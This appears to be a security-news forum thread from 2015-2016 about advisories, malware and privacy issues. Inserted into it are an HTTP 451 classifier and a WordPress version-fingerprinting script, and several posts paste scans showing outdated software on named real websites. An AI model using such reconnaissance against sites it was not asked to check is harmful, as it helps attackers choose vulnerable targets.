Over the course of the coming weeks, Google will be moving to distrust the “Class 3 Public Primary CA” root certificate operated by Symantec Corporation, across Chrome, Android, and Google products. We are taking this action in response to a notification by Symantec Corporation that, as of December 1, 2015, Symantec has decided that this root will no longer comply with the CA/Browser Forum’s Baseline Requirements. As these requirements reflect industry best practice and are the foundation for publicly trusted certificates, the failure to comply with these represents an unacceptable risk to users of Google products.
taken from: https://googleonlinesecurity.blogspot.nl/2015/12/proactive-measures-in-digital.html
pol
-
Linksys routers vulnerable through CGI Scripts: https://www.korelogic.com/Resources/Advisories/KL-001-2015-006.txt
polonus
-
Joomla! [20151201] - Core - Remote Code Execution Vulnerability
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
-> https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
-
Hi Asyn, and it is already being actively abused, according to Sucuri's: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html Apply the hotfixes everybody, secure yourselves and your visitors: https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
polonus (volunteer website security analyst and website error-hunter)
-
Comcast Customers Targeted In Elaborate Malvertising Attack
https://blog.malwarebytes.org/malvertising-2/2015/12/comcast-customers-targeted-in-elaborate-malvertising-attack/?utm_source=Gplus&utm_medium=social
-
Gigantic botnet attacked Internet backbone's DNS-rootservers twice: http://arstechnica.com/security/2015/12/attack-flooded-internet-root-servers-with-5-million-queries-a-second/
polonus
-
“Steam VAC Remover” Leads to Mobile Offers
https://blog.malwarebytes.org/online-security/2015/12/steam-vac-remover-leads-to-mobile-offers/?utm_source=Gplus&utm_medium=social
More Replica Automated Mails Lead to Fake Pharma
https://blog.malwarebytes.org/fraud-scam/2015/12/more-replica-automated-mails-lead-to-fake-pharma/?utm_source=Gplus&utm_medium=social
Massive MacKeeper data breach
https://blog.malwarebytes.org/mac/2015/12/massive-mackeeper-data-breach/?utm_source=Gplus&utm_medium=social
Why layered security is important (Common sense approach most forum members practice.)
https://www.malwarebytes.org/articles/why-layered-security-is-important/?utm_source=Gplus&utm_medium=social
-
For cybercriminals nothing is sacred: https://www.proofpoint.com/us/threat-insight/post/Risky-Mobile-Apps-Steal-Data
polonus
-
Gigantic botnet attacked Internet backbone's DNS-rootservers twice: http://arstechnica.com/security/2015/12/attack-flooded-internet-root-servers-with-5-million-queries-a-second/
polonus
http://www.msn.com/en-us/news/technology/are-isis-hackers-trying-to-destroy-the-internet/ar-BBnEEQy?li=BBnb7Kz
-
Comcast Customers Targeted In Elaborate Malvertising Attack
https://blog.malwarebytes.org/malvertising-2/2015/12/comcast-customers-targeted-in-elaborate-malvertising-attack/?utm_source=Gplus&utm_medium=social
Use of an ad-blocker add-on or extension would block step 3 in attack scenario:
-
All other institutions declined to comment: https://theintercept.com/surveillance-catalogue/
The Department of Justice, however, argued that all use of such devices are “consistent with the requirements and protections of the Constitution, including the Fourth Amendment, and applicable statutory authorities.”
polonus
-
May the force, but not the malware, be with you!
https://blog.avast.com/2015/12/17/may-the-force-but-not-the-malware-be-with-you/
-
Not Happy Or Healthy:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1450442832871-72676.png)
If you get this please put it where it belongs - In The TRASH
-
Hack Into a Linux Computer by Hitting the Backspace 28 Times
http://motherboard.vice.com/read/hack-into-a-linux-computer-by-hitting-the-backspace-28-times
-
PUPs Masquerade as Installer for Antivirus and Anti-Adware
https://blog.malwarebytes.org/online-security/2015/12/pups-masquerade-as-installer-for-antivirus-and-anti-adware/?utm_source=Gplus&utm_medium=social
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not let a chance pass to cooperate in order to be better able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise, or often have their hands tied behind their backs by ignoring and restrictive management. Even some cold reconnaissance scans of sorts could get them into trouble if they haven't obtained explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand, where the dark forces will always have the better of us all.
polonus (volunteer website security analyst and website error hunter)
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not let a chance pass to cooperate in order to be better able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise, or often have their hands tied behind their backs by ignoring and restrictive management. Even some cold reconnaissance scans of sorts could get them into trouble if they haven't obtained explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand, where the dark forces will always have the better of us all.
polonus (volunteer website security analyst and website error hunter)
Pretty good Avast: http://www.dnsinspect.com/avast.com/1450698276
-
Webmasters, website admins and hosters should from time to time feel the pulse of their DNS health, like here at DNS Inspect: http://www.dnsinspect.com/
With a lot of issues this produces information to better target misconfigurations and reports for hosters etc. to cure where issues could occur or already have materialized.
The dark side of malcreants does not leave a chance pass to be able to cooperate to better be able to abuse. The good side's analysts and researchers often fail to spread such info and rather sit on their expertise or often have their hands bound on their backs by ignoring and restrictive management. Even some cold reconnaissance scannings of sorts could get them into problems if they haven't achieved explicit written permission to perform these. If we all do not change this, we will never get away from the situation at hand where the dark forces always will have the better of us all.
polonus (volunteer website security analyst and website error hunter)
Pretty good Avast: http://www.dnsinspect.com/avast.com/1450698276
Getting a good report is pretty easy. :)
http://www.dnsinspect.com/bob3160.com/1450705872
-
Website Status 451, website cannot be visited because legally restricted. When the code is not shown it could be government censorship that one tries to hide (policor (social) media censorship etc. etc.) Another issue to reckon with on the free Interwebs.
Read about this new http statuscode: https://datatracker.ietf.org/doc/draft-ietf-httpbis-legally-restricted-status/
Why it was brought in, read: https://www.mnot.net/blog/2015/12/18/451
polonus
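As an added example (not code from polonus's post or from the IETF draft), here is how a monitoring script could classify the responses it records and pull out the party named as responsible for the block. It assumes the header convention the draft was published with as RFC 7725: a 451 response should carry a Link header with rel="blocked-by"; the sample responses are constructed.

```python
"""Classify HTTP responses for legal-restriction (451) signalling.

Added example, not part of the forum post or the IETF draft. It assumes the
Link header convention published as RFC 7725: a 451 response SHOULD carry
Link: <uri>; rel="blocked-by" naming the entity that imposed the block.
The responses at the bottom are constructed for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple

# One "<uri>; param; param" element of a Link header (RFC 8288 syntax);
# elements are comma separated, so parameters stop at the next comma.
LINK_ELEMENT_RE = re.compile(r'<([^>]+)>\s*((?:;[^,]*)*)')
REL_RE = re.compile(r'rel\s*=\s*"?([^";]+)"?')


def blocked_by(link_header: Optional[str]) -> Optional[str]:
    """Return the URI of the rel="blocked-by" link, or None when absent."""
    if not link_header:
        return None
    for uri, params in LINK_ELEMENT_RE.findall(link_header):
        rel = REL_RE.search(params)
        # rel may list several relation types separated by spaces
        if rel and "blocked-by" in rel.group(1).split():
            return uri.strip()
    return None


def classify(status: int, headers: Dict[str, str]) -> Dict[str, object]:
    """Describe one response: is it legally restricted, and who says so?"""
    lowered = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    restricted = status == 451
    return {
        "status": status,
        "legally_restricted": restricted,
        # Only meaningful for 451; a 451 without a Link header hides who blocked it
        "blocked_by": blocked_by(lowered.get("link")) if restricted else None,
    }


def describe(status: int, headers: Dict[str, str]) -> str:
    """Human-readable one-liner used by the report below."""
    c = classify(status, headers)
    if not c["legally_restricted"]:
        return f"{status}: not flagged as legally restricted"
    if c["blocked_by"]:
        return f"451: legally restricted, block attributed to {c['blocked_by']}"
    return "451: legally restricted, blocking party not disclosed"


# Constructed sample responses (status, headers) as a monitor might record them
SAMPLE_RESPONSES: List[Tuple[int, Dict[str, str]]] = [
    (451, {"Link": '<https://legal-authority.example/order/1>; rel="blocked-by"'}),
    (451, {"link": '<https://cdn.example/a.css>; rel=preload, '
                   '<https://court.example>; rel="blocked-by"'}),
    (451, {}),
    (403, {}),
    (200, {}),
]


def report(responses=SAMPLE_RESPONSES) -> List[str]:
    return [describe(s, h) for s, h in responses]


if __name__ == "__main__":
    for line in report():
        print(line)
```

The third sample is the case the post warns about: the server admits the block with a 451 but names nobody, so the report can only say that the blocking party is undisclosed. A 403 or a quiet 200 with replaced content carries no such signal at all, which is why the status code alone is not a censorship detector.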
-
Consumers should act against Big Data Slurpers: https://www.enisa.europa.eu/activities/identity-and-trust/library/deliverables/big-data-protection/at_download/fullReport = ENISA's good practice in information security report.
Big Data Analytics means a big privacy risk. Only after Big Data Breaches anyone stirs a finger or rather all goes on as usual.
The general public is not aware of the privacy risks involved while growing dependent on using these Big Data Slurping Tools like PSM services. (Private Social Media, a contradictio in terminis).
polonus
-
Some would not like such a policy and/or rather choose another vendor: http://www.ctvnews.ca/business/blackberry-ceo-it-s-a-social-responsibility-to-give-police-data-in-some-cases-1.2707179
polonus
-
Joomla! - [20151206] - Core - Session Hardening
https://developer.joomla.org/security-centre/639-20151206-core-session-hardening.html
-> https://www.joomla.org/announcements/release-news/5643-joomla-3-4-7.html
-
Some would not like such a policy and/or rather choose another vendor: http://www.ctvnews.ca/business/blackberry-ceo-it-s-a-social-responsibility-to-give-police-data-in-some-cases-1.2707179
polonus
No at any cost isn't always the wisest choice. Yes without a just cause is just as incorrect. (IMHO)
-
Hi bob3160,
Well software management cannot take the seat of a judge, as a software vendor cannot discriminate until a subject has been found guilty.
So who is to decide here that the police should get such data and on what grounds? You cannot take the law into your own hands.
Well at least not in Europe. Well and it also will backfire, a vendor that starts to do these kind of things will be left with no unique selling point left.
polonus
-
Just like Google, Yahoo now also notifies users of suspected state-sponsored actors' attacks:
https://yahoo-security.tumblr.com/post/135674131435/notifying-our-users-of-attacks-by-suspected
polonus
-
Angler EK Drops TeslaCrypt Via Recent Flash Exploit
https://blog.malwarebytes.org/exploits-2/2015/12/angler-ek-drops-ransomware-newexploit/?utm_source=gplus&utm_medium=social
HSBC Phish: “Your account is currently locked!”
https://blog.malwarebytes.org/fraud-scam/2015/12/hsbc-phish-your-account-is-currently-locked/?utm_source=gplus&utm_medium=social
-
Very aggressive adware disables safebrowsing: https://blog.malwarebytes.org/online-security/2015/12/mintcast-pups-disable-safebrowsing-settings-in-firefox/
pol
-
Kicking in of an open door sort of an existing correlation between botnet activity and file sharing activity : https://blog.bitsighttech.com/bitsight-insights-peer-to-peer-peril
pol
-
Hyatt Notifies Customers Of Malware Activity
http://newsroom.hyatt.com/news-releases?item=123450
-
How does anti-malware work?
https://www.malwarebytes.org/articles/how-does-anti-malware-work/?utm_source=gplus&utm_medium=social
THE TOP THREE ONLINE SECURITY MENACES YOU SHOULD WORRY ABOUT IN 2016
http://www.fastcompany.com/3054760/elasticity/the-top-three-online-security-menaces-you-should-worry-about-in-2016
Here's how to dispose, recycle or trade in your old laptop
http://mashable.com/2015/12/26/laptop-recycling/?utm_cid=mash-com-Tw-tech-link%23sd613jsnjlqd#Dp_QpwUmlqqu
-
Recently Bought a Windows Computer? Microsoft Probably Has Your Encryption Key
https://theintercept.com/2015/12/28/recently-bought-a-windows-computer-microsoft-probably-has-your-encryption-key/
-
AVG Web Tune Up Chrome extension (still) has serious security flaws: https://code.google.com/p/google-security-research/issues/detail?id=675
Security through obscurity does not help this time, Google Zero Project researchers are relentless.
pol
-
Angry malcreant: http://www.bleepingcomputer.com/forums/t/599368/radamant-ransomware-kit-support-topic-encrypts-files-to-rrk-rdm-extension/page-4#entry3895835
polonus
-
Good to see that the malcreants are pis**d at the successful efforts of the anti-malware authors. It probably says a lot about the character of the malcreant writing the code, or possibly script kids on copy and paste coders.
-
In TalkTalk aftermath, it's time for companies to pay higher price for breaches
http://www.zdnet.com/article/in-talktalk-aftermath-its-time-for-companies-to-pay-price-for-breaches/
Millions of Voter Records Posted, and Some Fear Hacker Field Day
http://www.nytimes.com/2015/12/31/us/politics/voting-records-released-privacy-concerns.html?src=twr&smid=tw-nytimes&smtyp=cur&_r=1
Safe Browsing Scam: From Amazon to Rackspace
https://blog.malwarebytes.org/fraud-scam/2015/12/safebrowsing-scam-from-amazon-to-rackspace/?utm_source=gplus&utm_medium=social
-
Virus Scanners endanger or kill security and safety of encrypted connections.
No TLS-proxy was found completely secure against attacks, see this research paper: https://madiba.encs.concordia.ca/~x_decarn/papers/tls-proxy-ndss2016.pdf
Anyone?
pol
-
Is this correct for Google to allow and isn't it controversial?
The Trump Filter, developed by Rob Spectre, blocks websites covering the front-runner and, according to the filter’s website, “makes America great again.”
“Eliminate Donald Trump from all your web browsing without leaving the Internet. Donald simply disappears from your view of every web page.”
According to Spectre, blocking news coverage of Donald Trump will “give concerned citizens the opportunity to actually focus on other candidates and learn about the issues.” Link: http://trumpfilter.com/
You cannot filter things away from reality because you rather wish to do so.
polonus
-
Drinking in excess also isn't good but makes you forget. :)
-
Or you just go silent on things: Microsoft failed to warn victims of Chinese email hack.
Read: http://www.reuters.com/article/us-microsoft-china-insight-idUSKBN0UE01Z20151231
polonus
-
Meet Ransom32: The first JavaScript ransomware
http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
Only 3(!) AVs detect this thing as I'm writing this.
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
-
Hi Steven Winderlich,
Interesting and a new task for the qualified removers here: http://www.bleepingcomputer.com/forums/t/554433/trojanwin32genericpakcobra/
Trojan.Win32.Generic.pak!cobra has great damaging power to completely mess up the system, so you should remove it as soon as possible as it can badly affect your data on the Server.
Damian
-
Most Destructive Malware of All Time
https://www.opswat.com/blog/most-destructive-malware-all-time
-
Hej Pondus,
I miss Virut mentioned there, as ever a virus was destructive, Virut was.
polonus
-
Yandex employee stole search engine source code, tried to sell it for just £19,000
http://arstechnica.co.uk/business/2015/12/yandex-employee-stole-search-engine-source-code-tried-to-sell-it-for-just-27000/
-
Meet Ransom32: The first JavaScript ransomware
http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/
Only 3(!) AVs detect this thing as I'm writing this.
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
New variant maybe Rootkit!!!!!
https://www.hybrid-analysis.com/sample/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a?environmentId=1
https://www.virustotal.com/en/file/01d3becf7f1abe4599b8c2f5153443d8b5e3ede50f65889939323b223ee2944a/analysis/
-
Security Notification and Linode Manager Password Reset
http://status.linode.com/incidents/ghdlhfnfngnh
-
Facebook “Page Disabled” Phish Wants your Card Details
https://blog.malwarebytes.org/fraud-scam/2016/01/facebook-page-disabled-phish-wants-your-card-details/?utm_source=gplus&utm_medium=social
WebSearcher PUP applies Proxy Lockdown
https://blog.malwarebytes.org/security-threat/2016/01/websearcher-pup-applies-proxy-lockdown/?utm_source=Gplus&utm_medium=social
-
Microsoft pulling support for Internet Explorer 8, 9, 10
http://money.cnn.com/2016/01/06/technology/microsoft-internet-explorer-support/
-
Abused by cybercriminals: http://blog.trendmicro.com/trendlabs-security-intelligence/lets-encrypt-now-being-abused-by-malvertisers/
pol
-
Attackers can take over websites. 25% of websites run the WordPress CMS.
New WordPress hole, users should update asap:
https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Re commit: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
With WP all files are inside a public folder,
normally one should only have an index.php, a .htaccess file and CSS/JS/Images files in there.
polonus
-
Attackers can take over websites. 25% of websites run the WordPress CMS.
New WordPress hole, users should update asap:
https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Re commit: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
With WP all files are inside a public folder,
normally one should only have an index.php, a .htaccess file and CSS/JS/Images files in there.
polonus
And the WP site already runs 4.5 :)
http://prntscr.com/9n5uva
-
Right you are, dear Steven, but you also have compatibility issues to reckon with, read: https://wordpress.org/support/topic/wordpress-version-and-php-compatibility & http://www.wpbeginner.com/beginners-guide/how-does-php-updates-by-your-web-host-impacts-your-wordpress-sites/ & https://wordpress.org/about/requirements/
pol
-
Pardon me but...every time I try to find the WP version using wappalyzer I can't find it.
What am I doing wrong? ??? Color me frustrated. ??? ::) ???
-
Pardon me but...every time I try to find the WP version using wappalyzer I can't find it.
What am I doing wrong? ??? Color me frustrated. ??? ::) ???
Wappalyzer sometimes can't get the version, and you can also block the version number on Apache and some other software :)
Look at Wordpress.org with Wappalyzer, it should show you a version number.
-
Hi Steven Winderlich and Para-Noid,
Easiest way is to go here: http://www.wpthemedetector.com/
Whenever you know there is WP used as CMS, do a scan here: hackertarget.com/wordpress-security-scan/
Here you can do a simple scan for version number, outdated WP plug-ins, whether there is major insecurity like user enumeration or directory listing enabled :o etc.
Use this bookmarklet: https://codex.wordpress.org/Press_This
The bookmark calls http://example.com/wp-admin/press-this.php?u=&t=&s=&i=
u = the url of the current page
t = the title of the current page
s = the text selection from the current page
i = url of an image file
Edit the bookmark within your browser to change the values passed if necessary.
polonus (volunteer website security analyst and website error-hunter)
-
They need to do some updates. http://prntscr.com/9nbs6q
Look at the Nginx version of Centos.org, or the Apache version on SUSE.com....... It's ridiculous.
@Damian: Check http://gsd-drolshagen.de/site/ on your link and look at the results.
-
Hi Steven Winderlich, you are right, see it now, some work to be done there by the admins.
WP - WP configuration:Custom. Web application version:
WordPress version: WordPress
Wordpress version from source: 4.0.9
Wordpress Version 4.0 based on: -http://gsd-drolshagen.de/site//wp-admin/js/common.js
WordPress directory: -http://gsd-drolshagen.de/site/wp-content
WordPress theme: -http://gsd-drolshagen.de/site/wp-content/themes/mutootheme/
Author:mutoo GmbH
Description:Template from mutoo
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2
Plug-ins to be checked and updated
The following plugins were detected by reading the HTML source of the WordPress sites front page.
responsive-slider latest release (0.1.8)
http://alienwp.com/plugins/responsive-slider
nivo-slider
wp-google-maps latest release (6.3.04)
http://www.wpgmaps.com
contact-form-7 latest release (4.3.1)
http://contactform7.com/
But also jQuery library issues: -http://gsd-drolshagen.de
Detected libraries:
jquery-migrate - 1.2.1 : -http://gsd-drolshagen.de/site/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.1 : -http://gsd-drolshagen.de/site/wp-includes/js/jquery/jquery.js?ver=1.11.1
1 vulnerable library detected
polonus (volunteer website security analyst and website error-hunter)
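As an added example that is neither the hackertarget.com scanner nor any code from the thread, the Python below shows how a report like the one above is derived from the page source alone: plugin directory names in asset paths, the ?ver= query strings WordPress appends to core and jQuery files, and the generator meta tag. It is written for checking what your own site discloses; the sample page, the host site.example and the version numbers in it are constructed, and the reference version 4.4.1 is the release linked earlier in the thread.

```python
"""Fingerprint what a WordPress front page discloses, from its HTML alone.

Added example; it is not the hackertarget.com scanner nor any code from the
thread. It applies the technique the report describes (reading plugin paths,
?ver= query strings on core assets and the generator meta tag out of the page
source) so a site owner can see what their own page gives away. The sample
page, host name and version numbers below are constructed.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

PLUGIN_RE = re.compile(r"/wp-content/plugins/([^/?#]+)/")
THEME_RE = re.compile(r"/wp-content/themes/([^/?#]+)/")


class _AssetCollector(HTMLParser):
    """Collect <script src>, <link href> and the generator <meta> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.generator = None
        self.assets: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("name", "").lower() == "generator":
            self.generator = a.get("content")
        elif tag == "script" and a.get("src"):
            self.assets.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.assets.append(a["href"])


def version_tuple(v: str):
    return tuple(int(x) for x in re.findall(r"\d+", v))


def is_older(found: str, reference: str) -> bool:
    """True when `found` is a lower version than `reference` (4.0.9 < 4.2)."""
    return version_tuple(found) < version_tuple(reference)


def fingerprint(html: str) -> Dict[str, object]:
    parser = _AssetCollector()
    parser.feed(html)
    core, plugins, themes, libraries = set(), {}, set(), {}
    for url in parser.assets:
        parsed = urlparse(url)
        path = parsed.path
        ver = parse_qs(parsed.query).get("ver", [None])[0]
        if "/wp-includes/js/jquery/" in path:
            # WordPress tags its bundled jQuery files with the library version
            name = re.sub(r"(\.min)?\.js$", "", path.rsplit("/", 1)[-1])
            libraries[name] = ver
        elif ("/wp-includes/" in path or "/wp-admin/" in path) and ver:
            # other core assets carry the WordPress core version in ?ver=
            core.add(ver)
        m = PLUGIN_RE.search(path)
        if m:
            plugins[m.group(1)] = ver  # ver may be None when a plugin sets none
        m = THEME_RE.search(path)
        if m:
            themes.add(m.group(1))
    return {
        "generator": parser.generator,
        "core_versions": sorted(core),
        "plugins": plugins,
        "themes": sorted(themes),
        "libraries": libraries,
    }


def findings(report: Dict[str, object], current_core: str) -> List[str]:
    """Turn the fingerprint into the kind of lines a scan report prints."""
    out = []
    if report["generator"]:
        out.append(f"generator meta tag discloses: {report['generator']}")
    for v in report["core_versions"]:
        if is_older(v, current_core):
            out.append(f"core version {v} inferred from asset URLs is outdated (current {current_core})")
        else:
            out.append(f"core version {v} disclosed by asset URLs")
    if report["plugins"]:
        out.append("plugins visible in page source: " + ", ".join(sorted(report["plugins"])))
    for name, ver in sorted(report["libraries"].items()):
        out.append(f"bundled library {name} {ver} disclosed; check it against its advisories")
    return out


# Constructed sample page; site.example and all versions are illustrative
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 4.0.9">
<link rel="stylesheet" href="http://site.example/wp-content/themes/mytheme/style.css?ver=4.0.9">
<script src="http://site.example/wp-includes/js/jquery/jquery.js?ver=1.11.1"></script>
<script src="http://site.example/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1"></script>
<script src="http://site.example/wp-admin/js/common.js?ver=4.0.9"></script>
<script src="http://site.example/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3.1"></script>
<script src="http://site.example/wp-content/plugins/responsive-slider/js/slider.js?ver=0.1.8"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for line in findings(fingerprint(SAMPLE_HTML), current_core="4.4.1"):
        print(line)
```

This also explains the Wappalyzer question above: removing the generator tag hides nothing when every core script still carries ?ver=4.0.9, and conversely a site that strips the version query strings will show no version at all. The theme stylesheet is deliberately not counted as a core version, since WordPress appends the core version to it by default but a theme may set its own.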
-
@Damian: Remember this site? http://www.druckerei-hachenburg.de/
Still a lot to update, IDIOTIC ADMINS I CAN SAY.
-
[Security-announce] NEW VMSA-2016-0001 VMware ESXi, Workstation, Player, and Fusion updates address important guest privilege escalation vulnerability
http://lists.vmware.com/pipermail/security-announce/2016/000316.html
-
Malvertising Campaign via Pop-under Ads Sends CryptoWall 4
https://blog.malwarebytes.org/malvertising-2/2016/01/malvertising-campaign-via-pop-under-ads-sends-cryptowall-4/?utm_source=gplus&utm_medium=social
Clickjacking Campaign Plays on European Cookie Law
https://blog.malwarebytes.org/fraud-scam/2016/01/clickjacking-campaign-plays-on-european-cookie-law/?utm_source=gplus&utm_medium=social
Was Mac OS X really the most vulnerable in 2015?
https://blog.malwarebytes.org/mac/2016/01/was-mac-os-x-really-the-most-vulnerable-in-2015/?utm_source=gplus&utm_medium=social
Stranger hacks family's baby monitor and talks to child at night (This one is really frightening.)
http://sfglobe.com/2016/01/06/stranger-hacks-familys-baby-monitor-and-talks-to-child-at-night/
-
A survey worth taking! (It's only three questions long.)
https://blog.malwarebytes.org/online-security/2016/01/survey-tell-us-what-you-think-about-our-pup-friday-posts/?utm_source=gplus&utm_medium=social
-
Nvidia breaks Chrome Incognito:
https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-incognito/
polonus
-
Nvidia breaks Chrome Incognito:
https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-incognito/
polonus
Interesting read - aside from Nvidia - I guess Incognito doesn't mean anything like our interpretation to Google. But then again it never has been high up the privacy ratings with all that it captures.
-
Critical Hole in Trend-Micro's Password Manager: https://code.google.com/p/google-security-research/issues/detail?id=693
How can an AV-vendor implement a tool like this Password Manager without having it thoroughly tested by security experts ::)
polonus
-
Critical Hole in Trend-Micro's Password Manager: https://code.google.com/p/google-security-research/issues/detail?id=693
How can an AV-vendor implement a tool like this Password Manager without having it thoroughly tested by security experts ::)
polonus
I thought that they had experts at Trend Micro ???
-
The Windows Vaults
https://blog.malwarebytes.org/online-security/2016/01/the-windows-vaults/?utm_source=gplus&utm_medium=social
Microsoft revokes Windows 8's patch privileges today
http://www.networkworld.com/article/3021337/computers/microsoft-revokes-windows-8s-patch-privileges-today.html
-
FortiOS SSH Undocumented Interactive Login Vulnerability
https://www.fortiguard.com/advisory/fortios-ssh-undocumented-interactive-login-vulnerability
-
Microsoft Security Bulletin Summary for January 2016
https://technet.microsoft.com/en-us/library/security/ms16-jan.aspx
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
Yes I probably should have mentioned that :( I was unsure about posting the exchange link though due to direct competition.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
Yes I probably should have mentioned that :( I was unsure about posting the exchange link though due to direct competition.
Which is why I just mentioned it rather than give a direct link.
-
Your Gmail account is not a spy tool for Google
http://www.androidcentral.com/your-gmail-account-not-spy-tool-google
-
No one aware that log-on data have been stolen...... :o :-[
Read: https://community.rapid7.com/community/infosec/blog/2016/01/13/get-the-2015-incident-detection-response-survey-results
See attached image...
pol
-
Nice analysis on what Asyn reported earlier here: Evil OpenSSH servers can steal your private login keys to other systems – patch now
Read: https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt
pol
-
LastPass attack called "LostPass": https://www.seancassidy.me/lostpass.html
polonus
-
A bad day for Trend Micro...
Password Manager flaw will hurt Trend Micro's reputation
http://www.networkworld.com/article/3023297/security/password-manager-flaw-will-hurt-trend-micros-reputation.html
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
It would be nice if Avast would participate in this exchange.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license (http://dl7.glitter-graphics.net/pub/3303/3303437vdpbfh2160.gif) (http://www.glitter-graphics.com)
-
Oracle Critical Patch Update Advisory - January 2016
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license <snip image>
Looks like they weren't talking about your lifetime ;D
Been using Outpost Firewall for even longer than avast.
-
Encrypt the web. Update - still much improvement needed:
https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what
Image file: https://www.eff.org/files/2013/12/16/crypto-survey-graphic-20131216.png
polonus
P.S. Also read my reports from the HTTPS Everywhere Atlas that from time to time land in the "virus and worms" section of these here forums and all the prevailing issues I mention and all the constant unique IDs tracking going on all the time.
We live in an insecure digital world, my dear forum friends, we really do!
Wake up IT, patch, upgrade, retire and code secure.... :)
Damian
-
MSN Home Page Drops More Malware Via Malvertising
https://blog.malwarebytes.org/malvertising-2/2016/01/msn-home-page-drops-more-malware-via-malvertising/?utm_source=gplus&utm_medium=social
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license <snip image>
Looks like they weren't talking about your lifetime ;D
Been using Outpost Firewall for even longer than avast.
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going to do, David, when you can no longer use your Outpost Pro FW any more?
-
<snip quotes>
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going to do, David, when you can no longer use your Outpost Pro FW any more?
There is nothing to stop you continuing using it - just no more program updates - so I'm in no rush to find a replacement.
I would suggest you try and download the latest version if you didn't save the installation file.
-
Or look into the alternatives. http://alternativeto.net/software/outpost-firewall-pro/
I use Windows Firewall Control on Windows.
polonus
-
<snip quotes>
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going to do, David, when you can no longer use your Outpost Pro FW any more?
There is nothing to stop you continuing using it - just no more program updates - so I'm in no rush to find a replacement.
I would suggest you try and download the latest version if you didn't save the installation file.
